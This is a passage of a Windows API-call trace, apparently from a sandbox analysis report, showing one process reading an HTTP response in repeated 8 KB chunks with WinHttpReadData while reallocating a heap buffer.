lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0172.349] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e766c0, Size=0xff00) returned 0x32e766c0 [0172.349] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e845be, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e845be*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0172.349] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0172.350] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e766c0, Size=0x11f00) returned 0x32e766c0 [0172.350] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e865be, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e865be*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0172.350] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0172.350] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e766c0, Size=0x13f00) returned 0x32e766c0 [0172.350] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e885be, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e885be*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0172.350] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.026] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e766c0, Size=0x15f00) returned 0x32e766c0 [0173.026] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e8a5be, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e8a5be*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.026] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.026] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e766c0, Size=0x17f00) returned 0x32e766c0 [0173.026] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32e8c5be, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e8c5be*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.026] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.027] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e766c0, Size=0x19f00) returned 0x32ac5770 [0173.029] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32add66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32add66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.029] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.029] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x1bf00) returned 0x32ac5770 [0173.029] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32adf66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32adf66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.029] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.030] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x1df00) returned 0x32ac5770 [0173.030] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32ae166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ae166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.030] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.030] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x1ff00) returned 0x32ac5770 [0173.030] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32ae366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ae366e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.030] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.030] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x21f00) returned 0x32ac5770 [0173.030] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32ae566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ae566e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.031] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.031] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x23f00) returned 0x32ac5770 [0173.031] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32ae766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ae766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.031] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.031] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x25f00) returned 0x32ac5770 [0173.032] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32ae966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ae966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.032] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.032] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x27f00) returned 0x32ac5770 [0173.032] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32aeb66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32aeb66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.032] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.331] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x29f00) returned 0x32ac5770 [0173.332] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32aed66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32aed66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.333] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.333] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x2bf00) returned 0x32ac5770 [0173.333] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32aef66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32aef66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.333] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.334] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x2df00) returned 0x32ac5770 [0173.334] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32af166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32af166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.334] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.334] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x2ff00) returned 0x32ac5770 [0173.334] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32af366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32af366e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.334] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.726] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x31f00) returned 0x32ac5770 [0173.727] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32af566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32af566e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.727] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.727] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x33f00) returned 0x32ac5770 [0173.727] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32af766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32af766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.727] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.728] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x35f00) returned 0x32ac5770 [0173.728] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32af966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32af966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.728] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.728] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x37f00) returned 0x32ac5770 [0173.728] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32afb66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32afb66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.729] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.729] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x39f00) returned 0x32ac5770 [0173.729] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32afd66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32afd66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.729] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.730] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x3bf00) returned 0x32ac5770 [0173.730] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32aff66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32aff66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.730] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.731] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x3df00) returned 0x32ac5770 [0173.731] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b0166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.731] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0173.731] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x3ff00) returned 0x32ac5770 [0173.731] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b0366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0366e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0173.731] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.031] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x41f00) returned 0x32ac5770 [0174.032] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b0566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0566e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.032] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.032] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x43f00) returned 0x32ac5770 [0174.032] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b0766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.033] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.033] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x45f00) returned 0x32ac5770 [0174.033] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b0966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.033] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.036] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x47f00) returned 0x32ac5770 [0174.036] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b0b66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0b66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.036] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.036] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x49f00) returned 0x32ac5770 [0174.036] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b0d66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0d66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.037] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.037] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x4bf00) returned 0x32ac5770 [0174.037] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b0f66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b0f66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.037] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.325] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x4df00) returned 0x32ac5770 [0174.325] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b1166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.325] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.326] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x4ff00) returned 0x32ac5770 [0174.326] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b1366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1366e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.326] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.326] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x51f00) returned 0x32ac5770 [0174.326] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b1566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1566e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.326] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.326] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x53f00) returned 0x32ac5770 [0174.326] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b1766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.327] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.330] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x55f00) returned 0x32ac5770 [0174.330] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b1966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.330] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.331] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x57f00) returned 0x32ac5770 [0174.331] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b1b66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1b66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.331] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.331] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x59f00) returned 0x32ac5770 [0174.331] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b1d66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1d66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.331] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.332] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x5bf00) returned 0x32ac5770 [0174.332] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b1f66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b1f66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.332] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.620] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x5df00) returned 0x32ac5770 [0174.620] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b2166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.620] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.620] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x5ff00) returned 0x32ac5770 [0174.621] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b2366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2366e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.621] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.621] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x61f00) returned 0x32ac5770 [0174.621] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b2566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2566e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.621] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.621] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x63f00) returned 0x32ac5770 [0174.622] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b2766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.622] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.632] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x65f00) returned 0x32ac5770 [0174.632] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b2966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.632] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.632] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x67f00) returned 0x32ac5770 [0174.633] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b2b66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2b66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.633] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.633] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x69f00) returned 0x32ac5770 [0174.633] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b2d66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2d66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.633] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.633] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x6bf00) returned 0x32ac5770 [0174.634] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b2f66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b2f66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.634] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.916] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x6df00) returned 0x32ac5770 [0174.916] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b3166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.916] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.916] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x6ff00) returned 0x32ac5770 [0174.916] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b3366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3366e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0174.917] WinHttpQueryDataAvailable (in: hRequest=0x332c97f0, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0174.917] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x71f00) returned 0x32ac5770 [0174.917] WinHttpReadData (in: hRequest=0x332c97f0, lpBuffer=0x32b3566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32b3566e*, 